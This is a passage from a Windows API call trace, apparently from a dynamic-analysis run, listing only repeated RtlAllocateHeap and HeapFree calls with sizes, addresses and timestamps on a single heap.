Size=0x10) returned 0x17a1378 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a12e8 | out: hHeap=0x1780000) returned 1 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1498 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13d8 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1420 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b268 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1510 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a12e8 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1600 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a15b8 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1630 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a15e8 [0070.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a15d0 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1420 | out: hHeap=0x1780000) returned 1 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1540 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1300 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845370 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845370 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1378 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1300 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13d8 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452c0 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452c0 | out: hHeap=0x1780000) returned 1 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a13d8 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1540 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845598 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845360 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1300 [0070.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a13f0 [0070.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1540 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1420 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1498 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845570 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a15a0 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1588 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1618 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1648 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x178a680 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x178a998 [0070.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c28 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1378 | out: hHeap=0x1780000) returned 1 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13d8 | out: hHeap=0x1780000) returned 1 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a13f0 | out: hHeap=0x1780000) returned 1 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1300 | out: hHeap=0x1780000) returned 1 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1540 | out: hHeap=0x1780000) returned 1 [0070.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1420 | out: hHeap=0x1780000) returned 1 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1498 | out: hHeap=0x1780000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1c40 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c10 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452b0 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452b0 | out: hHeap=0x1780000) returned 1 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c40 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bc8 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1be0 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845380 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845380 | out: hHeap=0x1780000) returned 1 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1be0 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16) returned 0x1797108 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bf8 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845980 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845410 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c10 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bc8 [0070.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bb0 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bf8 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18454a8 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c70 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1958 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1a48 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a18b0 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1b08 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1ad8 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a19e8 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1bc8 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c40 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845370 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845370 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c40 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1be0 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bb0 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18453f0 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18453f0 | out: hHeap=0x1780000) returned 1 [0070.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bf8 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845778 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845320 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c10 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1be0 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bf8 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bb0 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bc8 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18455e8 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a18c8 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1a18 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1b98 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1b50 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1a30 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1940 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1b20 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1bb0 [0070.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bc8 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845350 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845350 | out: hHeap=0x1780000) returned 1 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bf8 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c40 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c58 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452d0 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452d0 | out: hHeap=0x1780000) returned 1 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1be0 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12) returned 0x1796d68 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c40 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18457c8 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845450 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c10 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c58 [0070.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c40 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bb0 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bc8 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x1845700 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1a60 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1970 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1988 [0070.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1b38 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a19a0 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a19d0 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1af0 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1bb0 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c40 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452e0 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18452e0 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bf8 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bb0 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845380 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845380 | out: hHeap=0x1780000) returned 1 [0070.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c10 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c58 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18455c0 [0070.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18453b0 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bb0 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bc8 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c40 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1be0 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18457f0 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a19b8 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1a78 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1b68 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1a90 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1928 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1aa8 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a18e0 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bf8 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bc8 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1be0 | out: hHeap=0x1780000) returned 1 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x17a1c40 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1bb0 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845330 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1bb0 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845330 | out: hHeap=0x1780000) returned 1 [0070.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c40 | out: hHeap=0x1780000) returned 1 [0070.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bf8 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c10 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1845420 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c10 | out: hHeap=0x1780000) returned 1 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1845420 | out: hHeap=0x1780000) returned 1 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c10 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x1793cb8 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c58 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x178b690 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x18452c0 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1793cb8 | out: hHeap=0x1780000) returned 1 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bb0 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1c40 [0070.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1c58 | out: hHeap=0x1780000) returned 1 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1be0 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1bc8 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1c58 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x18454f8 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a18f8 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1b80 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1ac0 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1a00 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1910 [0070.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x17a1540 